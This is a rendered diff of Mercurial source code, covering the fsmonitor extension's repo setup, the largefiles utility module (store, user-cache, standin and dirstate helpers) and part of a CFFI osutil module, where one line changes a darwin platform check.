    can gauge the size of the change.
    """
    distance = 0
    partial = True
    oldnode = repo['.'].node()
    newnode = repo[node].node()
    if matcher is None or matcher.always():
        partial = False
        distance = calcdistance(repo.unfiltered(), oldnode, newnode)

    with state_update(repo, name="hg.update", oldnode=oldnode, newnode=newnode,
                      distance=distance, partial=partial):
        return orig(
            repo, node, branchmerge, force, ancestor, mergeancestor,
            labels, matcher, **kwargs)
733
733
def reposetup(ui, repo):
    """Per-repo setup: attach fsmonitor state and a watchman client.

    Bails out silently when an incompatible extension is enabled, the repo
    is not local, the repo uses subrepos, the fsmonitor mode is 'off', or
    watchman is unavailable. Otherwise patches the repo class so status()
    goes through overridestatus, and (optionally) brackets transactions
    with watchman state notifications.
    """
    # We don't work with largefiles or inotify
    exts = extensions.enabled()
    for ext in _blacklist:
        if ext in exts:
            ui.warn(_('The fsmonitor extension is incompatible with the %s '
                      'extension and has been disabled.\n') % ext)
            return

    if repo.local():
        # We don't work with subrepos either.
        #
        # if repo[None].substate can cause a dirstate parse, which is too
        # slow. Instead, look for a file called hgsubstate,
        if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
            return

        fsmonitorstate = state.state(repo)
        if fsmonitorstate.mode == 'off':
            return

        try:
            client = watchmanclient.client(repo)
        except Exception as ex:
            _handleunavailable(ui, fsmonitorstate, ex)
            return

        repo._fsmonitorstate = fsmonitorstate
        repo._watchmanclient = client

        dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
        if cached:
            # at this point since fsmonitorstate wasn't present,
            # repo.dirstate is not a fsmonitordirstate
            makedirstate(repo, dirstate)

        class fsmonitorrepo(repo.__class__):
            def status(self, *args, **kwargs):
                orig = super(fsmonitorrepo, self).status
                return overridestatus(orig, self, *args, **kwargs)

            # transaction is only wrapped when the experimental
            # notification knob is enabled in the config
            if ui.configbool("experimental", "fsmonitor.transaction_notify"):
                def transaction(self, *args, **kwargs):
                    tr = super(fsmonitorrepo, self).transaction(
                        *args, **kwargs)
                    if tr.count != 1:
                        # nested transaction; the outermost one already
                        # sent state-enter
                        return tr
                    stateupdate = state_update(self, name="hg.transaction")
                    stateupdate.enter()

                    class fsmonitortrans(tr.__class__):
                        def _abort(self):
                            try:
                                result = super(fsmonitortrans, self)._abort()
                            finally:
                                stateupdate.exit(abort=True)
                            return result

                        def close(self):
                            try:
                                result = super(fsmonitortrans, self).close()
                            finally:
                                # only leave when the outermost nesting closed
                                if self.count == 0:
                                    stateupdate.exit()
                            return result

                    tr.__class__ = fsmonitortrans
                    return tr

        repo.__class__ = fsmonitorrepo
@@ -1,673 +1,673 b''
1 # Copyright 2009-2010 Gregory P. Ward
1 # Copyright 2009-2010 Gregory P. Ward
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 # Copyright 2010-2011 Fog Creek Software
3 # Copyright 2010-2011 Fog Creek Software
4 # Copyright 2010-2011 Unity Technologies
4 # Copyright 2010-2011 Unity Technologies
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 '''largefiles utility code: must not import other modules in this package.'''
9 '''largefiles utility code: must not import other modules in this package.'''
10 from __future__ import absolute_import
10 from __future__ import absolute_import
11
11
12 import copy
12 import copy
13 import hashlib
13 import hashlib
14 import os
14 import os
15 import stat
15 import stat
16
16
17 from mercurial.i18n import _
17 from mercurial.i18n import _
18
18
19 from mercurial import (
19 from mercurial import (
20 dirstate,
20 dirstate,
21 encoding,
21 encoding,
22 error,
22 error,
23 httpconnection,
23 httpconnection,
24 match as matchmod,
24 match as matchmod,
25 node,
25 node,
26 pycompat,
26 pycompat,
27 scmutil,
27 scmutil,
28 sparse,
28 sparse,
29 util,
29 util,
30 vfs as vfsmod,
30 vfs as vfsmod,
31 )
31 )
32
32
33 shortname = '.hglf'
33 shortname = '.hglf'
34 shortnameslash = shortname + '/'
34 shortnameslash = shortname + '/'
35 longname = 'largefiles'
35 longname = 'largefiles'
36
36
37 # -- Private worker functions ------------------------------------------
37 # -- Private worker functions ------------------------------------------
38
38
def getminsize(ui, assumelfiles, opt, default=10):
    """Return the minimum largefile size as a float.

    Prefers *opt*; when it is empty and *assumelfiles* is set, falls back
    to the [largefiles] minsize config value (defaulting to *default*).
    Aborts when the value is non-numeric or no size was determined.
    """
    size = opt
    if assumelfiles and not size:
        size = ui.config(longname, 'minsize', default=default)
    if size:
        try:
            size = float(size)
        except ValueError:
            raise error.Abort(
                _('largefiles: size must be number (not %s)\n') % size)
    if size is None:
        raise error.Abort(_('minimum size for largefiles must be specified'))
    return size
52
52
def link(src, dest):
    """Try to create hardlink - if that fails, efficiently make a copy."""
    util.makedirs(os.path.dirname(dest))
    try:
        util.oslink(src, dest)
    except OSError:
        # hardlinking failed (e.g. cross-device); fall back to an atomic
        # copy so readers never observe a half-written destination
        with open(src, 'rb') as fin, util.atomictempfile(dest) as fout:
            for chunk in util.filechunkiter(fin):
                fout.write(chunk)
        # preserve the source permissions on the copy
        os.chmod(dest, os.stat(src).st_mode)
64
64
def usercachepath(ui, hash):
    '''Return the correct location in the "global" largefiles cache for a file
    with the given hash.
    This cache is used for sharing of largefiles across repositories - both
    to preserve download bandwidth and storage space.'''
    cachedir = _usercachedir(ui)
    return os.path.join(cachedir, hash)
71
71
def _usercachedir(ui):
    '''Return the location of the "global" largefiles cache.'''
    # explicit configuration always wins over platform defaults
    path = ui.configpath(longname, 'usercache', None)
    if path:
        return path
    if pycompat.iswindows:
        # prefer the local (non-roaming) profile when available
        appdata = encoding.environ.get('LOCALAPPDATA',\
                encoding.environ.get('APPDATA'))
        if appdata:
            return os.path.join(appdata, longname)
    elif pycompat.isdarwin:
        home = encoding.environ.get('HOME')
        if home:
            return os.path.join(home, 'Library', 'Caches', longname)
    elif pycompat.isposix:
        # honor the XDG base-directory spec before falling back to ~/.cache
        path = encoding.environ.get('XDG_CACHE_HOME')
        if path:
            return os.path.join(path, longname)
        home = encoding.environ.get('HOME')
        if home:
            return os.path.join(home, '.cache', longname)
    else:
        raise error.Abort(_('unknown operating system: %s\n')
                          % pycompat.osname)
    # a known platform, but none of its expected environment variables set
    raise error.Abort(_('unknown %s usercache location') % longname)
97
97
def inusercache(ui, hash):
    """Return True when the user cache holds a largefile with *hash*."""
    return os.path.exists(usercachepath(ui, hash))
101
101
def findfile(repo, hash):
    '''Return store path of the largefile with the specified hash.
    As a side effect, the file might be linked from user cache.
    Return None if the file can't be found locally.'''
    path, exists = findstorepath(repo, hash)
    if exists:
        repo.ui.note(_('found %s in store\n') % hash)
        return path
    elif inusercache(repo.ui, hash):
        repo.ui.note(_('found %s in system cache\n') % hash)
        path = storepath(repo, hash)
        # hardlink (or copy) from the shared user cache into the repo store
        link(usercachepath(repo.ui, hash), path)
        return path
    return None
116
116
class largefilesdirstate(dirstate.dirstate):
    """A dirstate subclass that tracks largefiles.

    Paths handed to the base class are first normalized to unix ('/')
    separators via unixpath(); ignore handling is disabled entirely.
    """
    def __getitem__(self, key):
        return super(largefilesdirstate, self).__getitem__(unixpath(key))
    def normal(self, f):
        return super(largefilesdirstate, self).normal(unixpath(f))
    def remove(self, f):
        return super(largefilesdirstate, self).remove(unixpath(f))
    def add(self, f):
        return super(largefilesdirstate, self).add(unixpath(f))
    def drop(self, f):
        return super(largefilesdirstate, self).drop(unixpath(f))
    def forget(self, f):
        return super(largefilesdirstate, self).forget(unixpath(f))
    def normallookup(self, f):
        return super(largefilesdirstate, self).normallookup(unixpath(f))
    def _ignore(self, f):
        # largefiles are never ignored
        return False
    def write(self, tr=False):
        # (1) disable PENDING mode always
        # (lfdirstate isn't yet managed as a part of the transaction)
        # (2) avoid develwarn 'use dirstate.write with ....'
        super(largefilesdirstate, self).write(None)
139
139
def openlfdirstate(ui, repo, create=True):
    '''
    Return a dirstate object that tracks largefiles: i.e. its root is
    the repo root, but it is saved in .hg/largefiles/dirstate.
    '''
    vfs = repo.vfs
    lfstoredir = longname
    opener = vfsmod.vfs(vfs.join(lfstoredir))
    lfdirstate = largefilesdirstate(opener, ui, repo.root,
                                    repo.dirstate._validate,
                                    lambda: sparse.matcher(repo))

    # If the largefiles dirstate does not exist, populate and create
    # it. This ensures that we create it on the first meaningful
    # largefiles operation in a new clone.
    if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
        matcher = getstandinmatcher(repo)
        standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
                                      ignored=False)

        if len(standins) > 0:
            vfs.makedirs(lfstoredir)

        for standin in standins:
            lfile = splitstandin(standin)
            lfdirstate.normallookup(lfile)
    return lfdirstate
167
167
def lfdirstatestatus(lfdirstate, repo):
    '''Compute status for all largefiles, resolving "unsure" entries.

    Files whose dirstate entry is inconclusive are checked against the
    standin hash recorded in the working parent; clean ones are marked
    normal in the lfdirstate as a side effect. Returns the status tuple.
    '''
    pctx = repo['.']
    match = matchmod.always(repo.root, repo.getcwd())
    unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
                                  clean=False, unknown=False)
    modified, clean = s.modified, s.clean
    for lfile in unsure:
        try:
            fctx = pctx[standin(lfile)]
        except LookupError:
            fctx = None
        # No standin in the parent, or on-disk content differs from the
        # recorded hash: the file counts as modified.
        if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
            modified.append(lfile)
        else:
            clean.append(lfile)
            lfdirstate.normal(lfile)
    return s
185
185
def listlfiles(repo, rev=None, matcher=None):
    '''return a list of largefiles in the working copy or the
    specified changeset'''

    if matcher is None:
        matcher = getstandinmatcher(repo)

    names = []
    for f in repo[rev].walk(matcher):
        # For the working copy (rev is None) skip files unknown to the
        # dirstate; for a concrete revision everything walked counts.
        if rev is not None or repo.dirstate[f] != '?':
            names.append(splitstandin(f))
    return names
197
197
def instore(repo, hash, forcelocal=False):
    '''Return true if a largefile with the given hash exists in the store.'''
    return os.path.exists(storepath(repo, hash, forcelocal))
201
201
def storepath(repo, hash, forcelocal=False):
    '''Return the correct location in the repository largefiles store for a
    file with the given hash.'''
    # A shared repo keeps its primary store in the share source unless a
    # local lookup is explicitly forced.
    if forcelocal or not repo.shared():
        return repo.vfs.join(longname, hash)
    return repo.vfs.reljoin(repo.sharedpath, longname, hash)
208
208
def findstorepath(repo, hash):
    '''Search through the local store path(s) to find the file for the given
    hash. If the file is not found, its path in the primary store is
    returned. The return value is a tuple of (path, exists(path)).
    '''
    # For shared repos the primary store lives in the share source, but
    # for backward compatibility fall back to the local store when the
    # file is missing from the source.
    primary = storepath(repo, hash, False)

    if instore(repo, hash):
        return (primary, True)
    if repo.shared() and instore(repo, hash, True):
        return storepath(repo, hash, True), True

    return (primary, False)
225
225
def copyfromcache(repo, hash, filename):
    '''Copy the specified largefile from the repo or system cache to
    filename in the repository. Return true on success or false if the
    file was not found in either cache (which should not happen:
    this is meant to be called only after ensuring that the needed
    largefile exists in the cache).'''
    wvfs = repo.wvfs
    cachepath = findfile(repo, hash)
    if cachepath is None:
        return False
    wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
    # Writes into the working copy are deliberately non-atomic; a failed
    # write is detected below by the hash check.
    with open(cachepath, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
        gothash = copyandhash(util.filechunkiter(srcfd), destfd)
        if gothash != hash:
            # Cache content does not match its advertised hash: warn and
            # remove the bogus working-copy file.
            repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
                         % (filename, cachepath, gothash))
            wvfs.unlink(filename)
            return False
    return True
248
248
def copytostore(repo, ctx, file, fstandin):
    '''Copy largefile *file* (hash taken from standin *fstandin* in *ctx*)
    into the store, unless it is already there or missing on disk.'''
    wvfs = repo.wvfs
    hash = readasstandin(ctx[fstandin])
    if instore(repo, hash):
        return
    if not wvfs.exists(file):
        repo.ui.warn(_("%s: largefile %s not available from local store\n") %
                     (file, hash))
        return
    copytostoreabsolute(repo, wvfs.join(file), hash)
259
259
def copyalltostore(repo, node):
    '''Copy all largefiles in a given revision to the store'''

    ctx = repo[node]
    for filename in ctx.files():
        realfile = splitstandin(filename)
        # Only standins that actually exist in this revision's manifest
        # correspond to largefiles we can copy.
        if realfile is None or filename not in ctx.manifest():
            continue
        copytostore(repo, ctx, realfile, filename)
268
268
def copytostoreabsolute(repo, file, hash):
    '''Copy *file* (an absolute path) into the store under *hash*,
    hardlinking from the user cache when the content is already there.'''
    if inusercache(repo.ui, hash):
        link(usercachepath(repo.ui, hash), storepath(repo, hash))
        return
    util.makedirs(os.path.dirname(storepath(repo, hash)))
    dst = util.atomictempfile(storepath(repo, hash),
                              createmode=repo.store.createmode)
    with open(file, 'rb') as srcf:
        with dst as dstf:
            for chunk in util.filechunkiter(srcf):
                dstf.write(chunk)
    linktousercache(repo, hash)
280
280
def linktousercache(repo, hash):
    '''Link / copy the largefile with the specified hash from the store
    to the cache.'''
    cachepath = usercachepath(repo.ui, hash)
    link(storepath(repo, hash), cachepath)
286
286
def getstandinmatcher(repo, rmatcher=None):
    '''Return a match object that applies rmatcher to the standin directory'''
    wvfs = repo.wvfs
    standindir = shortname

    # Silence warnings about missing files or directories.
    badfn = lambda f, msg: None

    if rmatcher and not rmatcher.always():
        # Map each requested pattern into the standin directory.
        pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
        if not pats:
            pats = [wvfs.join(standindir)]
    else:
        # No patterns: match the whole standin directory.
        pats = [wvfs.join(standindir)]
    return scmutil.match(repo[None], pats, badfn=badfn)
304
304
def composestandinmatcher(repo, rmatcher):
    '''Return a matcher that accepts standins corresponding to the
    files accepted by rmatcher. Pass the list of files in the matcher
    as the paths specified by the user.'''
    smatcher = getstandinmatcher(repo, rmatcher)
    isstandin = smatcher.matchfn

    def composedmatchfn(f):
        # Accept f only if it is a standin AND its largefile name is
        # accepted by the original matcher.
        return isstandin(f) and rmatcher.matchfn(splitstandin(f))

    smatcher.matchfn = composedmatchfn
    return smatcher
316
316
def standin(filename):
    '''Return the repo-relative path to the standin for the specified big
    file.'''
    # Notes:
    # 1) Some callers want an absolute path, but for instance addlargefiles
    #    needs it repo-relative so it can be passed to repo[None].add(). So
    #    leave it up to the caller to use repo.wjoin() to get an absolute
    #    path.
    # 2) Join with '/' because that's what dirstate always uses, even on
    #    Windows. Change existing separator to '/' first in case we are
    #    passed filenames from an external source (like the command line).
    return shortnameslash + util.pconvert(filename)
328
328
def isstandin(filename):
    '''Return true if filename is a big file standin. filename must be
    in Mercurial's internal form (slash-separated).'''
    return filename.startswith(shortnameslash)
333
333
def splitstandin(filename):
    '''Return the largefile name for standin *filename*, or None if it
    is not a standin.

    Split on / because that's what dirstate always uses, even on Windows.
    Change local separator to / first just in case we are passed filenames
    from an external source (like the command line).
    '''
    prefix, sep, rest = util.pconvert(filename).partition('/')
    if sep and prefix == shortname:
        return rest
    return None
343
343
def updatestandin(repo, lfile, standin):
    """Re-calculate hash value of lfile and write it into standin

    This assumes that "lfutil.standin(lfile) == standin", for efficiency.
    """
    if not repo.wvfs.exists(lfile):
        raise error.Abort(_('%s: file not found!') % lfile)
    abspath = repo.wjoin(lfile)
    writestandin(repo, standin, hashfile(abspath), getexecutable(abspath))
356
356
def readasstandin(fctx):
    '''read hex hash from given filectx of standin file

    This encapsulates how "standin" data is stored into storage layer.'''
    data = fctx.data()
    return data.strip()
362
362
def writestandin(repo, standin, hash, executable):
    '''write hash to <repo.root>/<standin>'''
    flags = 'x' if executable else ''
    repo.wwrite(standin, hash + '\n', flags)
366
366
def copyandhash(instream, outfile):
    '''Read bytes from instream (iterable) and write them to outfile,
    computing the SHA-1 hash of the data along the way. Return the hash
    as a hex string.'''
    # hashlib.sha1() with no argument is equivalent to the old
    # hashlib.sha1('') but also works on Python 3 (where a text seed is
    # a TypeError), and matches sibling hexsha1() below.
    hasher = hashlib.sha1()
    for data in instream:
        hasher.update(data)
        outfile.write(data)
    return hasher.hexdigest()
375
375
def hashfile(file):
    '''Return the hex SHA-1 of *file*'s content, or '' if it is missing.'''
    if os.path.exists(file):
        with open(file, 'rb') as fd:
            return hexsha1(fd)
    return ''
381
381
def getexecutable(filename):
    '''Return a truthy value iff *filename* is executable by user, group
    AND other (all three x bits set).'''
    mode = os.stat(filename).st_mode
    return ((mode & stat.S_IXUSR)
            and (mode & stat.S_IXGRP)
            and (mode & stat.S_IXOTH))
387
387
def urljoin(first, second, *arg):
    '''Join two or more URL components, ensuring exactly one '/' at each
    seam (a single leading slash on the right side is dropped).'''
    def _seam(left, right):
        sep = '' if left.endswith('/') else '/'
        if right.startswith('/'):
            right = right[1:]
        return left + sep + right

    url = _seam(first, second)
    for piece in arg:
        url = _seam(url, piece)
    return url
400
400
def hexsha1(fileobj):
    """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
    object data"""
    digest = hashlib.sha1()
    for chunk in util.filechunkiter(fileobj):
        digest.update(chunk)
    return digest.hexdigest()
408
408
def httpsendfile(ui, filename):
    '''Return an httpsendfile wrapper for *filename*, opened read-binary.'''
    return httpconnection.httpsendfile(ui, filename, 'rb')
411
411
def unixpath(path):
    '''Return a version of path normalized for use with the lfdirstate.'''
    normalized = os.path.normpath(path)
    return util.pconvert(normalized)
415
415
def islfilesrepo(repo):
    '''Return true if the repo is a largefile repo.'''
    haslfiles = ('largefiles' in repo.requirements and
                 any(shortnameslash in f[0]
                     for f in repo.store.datafiles()))
    if haslfiles:
        return True

    # Fall back to the lfdirstate: any tracked entry means largefiles.
    return any(openlfdirstate(repo.ui, repo, False))
423
423
class storeprotonotcapable(Exception):
    '''Raised when no configured store supports the requested store types.

    ``storetypes`` records the store types that were requested but not
    available.
    '''
    def __init__(self, storetypes):
        self.storetypes = storetypes
427
427
def getstandinsstate(repo):
    '''Return a list of (lfile, hash) pairs for all tracked standins;
    hash is None when the standin cannot be read.'''
    standins = []
    matcher = getstandinmatcher(repo)
    wctx = repo[None]
    walked = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
                                ignored=False)
    for fstandin in walked:
        lfile = splitstandin(fstandin)
        try:
            hash = readasstandin(wctx[fstandin])
        except IOError:
            hash = None
        standins.append((lfile, hash))
    return standins
441
441
def synclfdirstate(repo, lfdirstate, lfile, normallookup):
    '''Propagate the dirstate state of *lfile*'s standin into lfdirstate.

    ``normallookup`` forces a re-check of a file in 'n' state instead of
    trusting it as clean.
    '''
    lfstandin = standin(lfile)
    if lfstandin in repo.dirstate:
        entry = repo.dirstate._map[lfstandin]
        state, mtime = entry[0], entry[3]
    else:
        state, mtime = '?', -1

    if state == 'n':
        if normallookup or mtime < 0 or not repo.wvfs.exists(lfile):
            # state 'n' doesn't ensure 'clean' in this case
            lfdirstate.normallookup(lfile)
        else:
            lfdirstate.normal(lfile)
    elif state == 'm':
        lfdirstate.normallookup(lfile)
    elif state == 'r':
        lfdirstate.remove(lfile)
    elif state == 'a':
        lfdirstate.add(lfile)
    elif state == '?':
        lfdirstate.drop(lfile)
464
464
def markcommitted(orig, ctx, node):
    '''Wrapper for committablectx.markcommitted: sync the lfdirstate and
    populate the store after a commit.'''
    repo = ctx.repo()

    orig(node)

    # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
    # because files coming from the 2nd parent are omitted in the latter.
    #
    # The former should be used to get targets of "synclfdirstate",
    # because such files:
    # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
    # - have to be marked as "n" after commit, but
    # - aren't listed in "repo[node].files()"

    lfdirstate = openlfdirstate(repo.ui, repo)
    for f in ctx.files():
        lfile = splitstandin(f)
        if lfile is None:
            continue
        synclfdirstate(repo, lfdirstate, lfile, False)
    lfdirstate.write()

    # As part of committing, copy all of the largefiles into the cache.
    #
    # Using "node" instead of "ctx" implies additional "repo[node]"
    # lookup while copyalltostore(), but can omit redundant check for
    # files coming from the 2nd parent, which should exist in store
    # at merging.
    copyalltostore(repo, node)
493
493
def getlfilestoupdate(oldstandins, newstandins):
    '''Return the largefile names whose (name, hash) entry differs between
    the two standin-state lists, without duplicates.'''
    changed = set(oldstandins) ^ set(newstandins)
    names = []
    for entry in changed:
        name = entry[0]
        if name not in names:
            names.append(name)
    return names
501
501
def getlfilestoupload(repo, missing, addfunc):
    '''For every revision in *missing*, call addfunc(standin, hash) for
    each standin present in that revision, showing a progress bar.'''
    for i, n in enumerate(missing):
        repo.ui.progress(_('finding outgoing largefiles'), i,
                         unit=_('revisions'), total=len(missing))
        parents = [p for p in repo[n].parents() if p != node.nullid]

        # Look up the context with lfstatus disabled so status is not
        # recomputed in largefiles terms.
        oldlfstatus = repo.lfstatus
        repo.lfstatus = False
        try:
            ctx = repo[n]
        finally:
            repo.lfstatus = oldlfstatus

        files = set(ctx.files())
        if len(parents) == 2:
            # For merges, ctx.files() is incomplete: also consider files
            # present in only one parent, and files whose entry differs
            # from either parent's manifest.
            mc = ctx.manifest()
            mp1 = ctx.parents()[0].manifest()
            mp2 = ctx.parents()[1].manifest()
            for f in mp1:
                if f not in mc:
                    files.add(f)
            for f in mp2:
                if f not in mc:
                    files.add(f)
            for f in mc:
                if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
                    files.add(f)
        for fn in files:
            if isstandin(fn) and fn in ctx:
                addfunc(fn, readasstandin(ctx[fn]))
    repo.ui.progress(_('finding outgoing largefiles'), None)
533
533
def updatestandinsbymatch(repo, match):
    '''Update standins in the working directory according to specified match

    This returns (possibly modified) ``match`` object to be used for
    subsequent commit process.
    '''

    ui = repo.ui

    # Case 1: user calls commit with no specific files or
    # include/exclude patterns: refresh and commit all files that
    # are "dirty".
    if match is None or match.always():
        # Spend a bit of time here to get a list of files we know
        # are modified so we can compare only against those.
        # It can cost a lot of time (several seconds)
        # otherwise to update all standins if the largefiles are
        # large.
        lfdirstate = openlfdirstate(ui, repo)
        dirtymatch = matchmod.always(repo.root, repo.getcwd())
        unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
                                      clean=False, unknown=False)
        modifiedfiles = unsure + s.modified + s.added + s.removed
        lfiles = listlfiles(repo)
        # This only loops through largefiles that exist (not
        # removed/renamed).
        for lfile in lfiles:
            if lfile not in modifiedfiles:
                continue
            fstandin = standin(lfile)
            # The standin may be absent when a rebase is in progress and
            # the working copy is not updated yet; likewise the largefile
            # itself.
            if repo.wvfs.exists(fstandin) and repo.wvfs.exists(lfile):
                updatestandin(repo, lfile, fstandin)

        return match

    lfiles = listlfiles(repo)
    match._files = repo._subdirlfs(match.files(), lfiles)

    # Case 2: user calls commit with specified patterns: refresh
    # any matching big files.
    smatcher = composestandinmatcher(repo, match)
    standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
                                  ignored=False)

    # No matching big files: get out of the way and pass control to
    # the usual commit() method.
    if not standins:
        return match

    # Refresh all matching big files. It's possible that the
    # commit will end up failing, in which case the big files will
    # stay refreshed. No harm done: the user modified them and
    # asked to commit them, so sooner or later we're going to
    # refresh the standins. Might as well leave them refreshed.
    lfdirstate = openlfdirstate(ui, repo)
    for fstandin in standins:
        lfile = splitstandin(fstandin)
        if lfdirstate[lfile] != 'r':
            updatestandin(repo, lfile, fstandin)

    # Cook up a new matcher that only matches regular files or
    # standins corresponding to the big files requested by the
    # user. Have to modify _files to prevent commit() from
    # complaining "not tracked" for big files.
    match = copy.copy(match)
    origmatchfn = match.matchfn

    # Check both the list of largefiles and the list of
    # standins because if a largefile was removed, it
    # won't be in the list of largefiles at this point.
    match._files += sorted(standins)

    actualfiles = []
    for f in match._files:
        fstandin = standin(f)

        # For largefiles, only one of the normal and standin should be
        # committed (except if one of them is a remove). In the case of a
        # standin removal, drop the normal file if it is unknown to
        # dirstate. Thus, skip plain largefile names but keep the standin.
        if f in lfiles or fstandin in standins:
            standinremoved = repo.dirstate[fstandin] == 'r'
            if not standinremoved and repo.dirstate[f] != 'r':
                continue
            if standinremoved and repo.dirstate[f] == '?':
                continue

        actualfiles.append(f)
    match._files = actualfiles

    def matchfn(f):
        if origmatchfn(f):
            # Requested directly: commit the standin instead of the
            # plain largefile name.
            return f not in lfiles
        else:
            return f in standins

    match.matchfn = matchfn

    return match
636
636
class automatedcommithook(object):
    '''Stateful hook to update standins at the 1st commit of resuming

    For efficiency, updating standins in the working directory should
    be avoided while automated committing (like rebase, transplant and
    so on), because they should be updated before committing.

    But the 1st commit of resuming automated committing (e.g. ``rebase
    --continue``) should update them, because largefiles may be
    modified manually.
    '''
    def __init__(self, resuming):
        # True until the first commit after resuming has run.
        self.resuming = resuming

    def __call__(self, repo, match):
        if not self.resuming:
            return match
        # First commit after resuming: refresh standins once, then
        # become a no-op for subsequent commits.
        self.resuming = False
        return updatestandinsbymatch(repo, match)
657
657
def getstatuswriter(ui, repo, forcibly=None):
    '''Return the function to write largefiles specific status out

    If ``forcibly`` is ``None``, this returns the last element of
    ``repo._lfstatuswriters`` as "default" writer function.

    Otherwise, this returns the function to always write out (or
    ignore if ``not forcibly``) status.
    '''
    if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
        return repo._lfstatuswriters[-1]
    if forcibly:
        return ui.status  # forcibly WRITE OUT
    return lambda *msg, **opts: None  # forcibly IGNORE
@@ -1,102 +1,102 b''
1 # osutil.py - CFFI version of osutil.c
1 # osutil.py - CFFI version of osutil.c
2 #
2 #
3 # Copyright 2016 Maciej Fijalkowski <fijall@gmail.com>
3 # Copyright 2016 Maciej Fijalkowski <fijall@gmail.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import os
10 import os
11 import stat as statmod
11 import stat as statmod
12
12
13 from ..pure.osutil import *
13 from ..pure.osutil import *
14
14
15 from .. import (
15 from .. import (
16 pycompat,
16 pycompat,
17 )
17 )
18
18
19 if pycompat.sysplatform == 'darwin':
19 if pycompat.isdarwin:
20 from . import _osutil
20 from . import _osutil
21
21
22 ffi = _osutil.ffi
22 ffi = _osutil.ffi
23 lib = _osutil.lib
23 lib = _osutil.lib
24
24
25 listdir_batch_size = 4096
25 listdir_batch_size = 4096
26 # tweakable number, only affects performance, which chunks
26 # tweakable number, only affects performance, which chunks
27 # of bytes do we get back from getattrlistbulk
27 # of bytes do we get back from getattrlistbulk
28
28
29 attrkinds = [None] * 20 # we need the max no for enum VXXX, 20 is plenty
29 attrkinds = [None] * 20 # we need the max no for enum VXXX, 20 is plenty
30
30
31 attrkinds[lib.VREG] = statmod.S_IFREG
31 attrkinds[lib.VREG] = statmod.S_IFREG
32 attrkinds[lib.VDIR] = statmod.S_IFDIR
32 attrkinds[lib.VDIR] = statmod.S_IFDIR
33 attrkinds[lib.VLNK] = statmod.S_IFLNK
33 attrkinds[lib.VLNK] = statmod.S_IFLNK
34 attrkinds[lib.VBLK] = statmod.S_IFBLK
34 attrkinds[lib.VBLK] = statmod.S_IFBLK
35 attrkinds[lib.VCHR] = statmod.S_IFCHR
35 attrkinds[lib.VCHR] = statmod.S_IFCHR
36 attrkinds[lib.VFIFO] = statmod.S_IFIFO
36 attrkinds[lib.VFIFO] = statmod.S_IFIFO
37 attrkinds[lib.VSOCK] = statmod.S_IFSOCK
37 attrkinds[lib.VSOCK] = statmod.S_IFSOCK
38
38
39 class stat_res(object):
39 class stat_res(object):
40 def __init__(self, st_mode, st_mtime, st_size):
40 def __init__(self, st_mode, st_mtime, st_size):
41 self.st_mode = st_mode
41 self.st_mode = st_mode
42 self.st_mtime = st_mtime
42 self.st_mtime = st_mtime
43 self.st_size = st_size
43 self.st_size = st_size
44
44
45 tv_sec_ofs = ffi.offsetof("struct timespec", "tv_sec")
45 tv_sec_ofs = ffi.offsetof("struct timespec", "tv_sec")
46 buf = ffi.new("char[]", listdir_batch_size)
46 buf = ffi.new("char[]", listdir_batch_size)
47
47
48 def listdirinternal(dfd, req, stat, skip):
48 def listdirinternal(dfd, req, stat, skip):
49 ret = []
49 ret = []
50 while True:
50 while True:
51 r = lib.getattrlistbulk(dfd, req, buf, listdir_batch_size, 0)
51 r = lib.getattrlistbulk(dfd, req, buf, listdir_batch_size, 0)
52 if r == 0:
52 if r == 0:
53 break
53 break
54 if r == -1:
54 if r == -1:
55 raise OSError(ffi.errno, os.strerror(ffi.errno))
55 raise OSError(ffi.errno, os.strerror(ffi.errno))
56 cur = ffi.cast("val_attrs_t*", buf)
56 cur = ffi.cast("val_attrs_t*", buf)
57 for i in range(r):
57 for i in range(r):
58 lgt = cur.length
58 lgt = cur.length
59 assert lgt == ffi.cast('uint32_t*', cur)[0]
59 assert lgt == ffi.cast('uint32_t*', cur)[0]
60 ofs = cur.name_info.attr_dataoffset
60 ofs = cur.name_info.attr_dataoffset
61 str_lgt = cur.name_info.attr_length
61 str_lgt = cur.name_info.attr_length
62 base_ofs = ffi.offsetof('val_attrs_t', 'name_info')
62 base_ofs = ffi.offsetof('val_attrs_t', 'name_info')
63 name = str(ffi.buffer(ffi.cast("char*", cur) + base_ofs + ofs,
63 name = str(ffi.buffer(ffi.cast("char*", cur) + base_ofs + ofs,
64 str_lgt - 1))
64 str_lgt - 1))
65 tp = attrkinds[cur.obj_type]
65 tp = attrkinds[cur.obj_type]
66 if name == "." or name == "..":
66 if name == "." or name == "..":
67 continue
67 continue
68 if skip == name and tp == statmod.S_ISDIR:
68 if skip == name and tp == statmod.S_ISDIR:
69 return []
69 return []
70 if stat:
70 if stat:
71 mtime = cur.mtime.tv_sec
71 mtime = cur.mtime.tv_sec
72 mode = (cur.accessmask & ~lib.S_IFMT)| tp
72 mode = (cur.accessmask & ~lib.S_IFMT)| tp
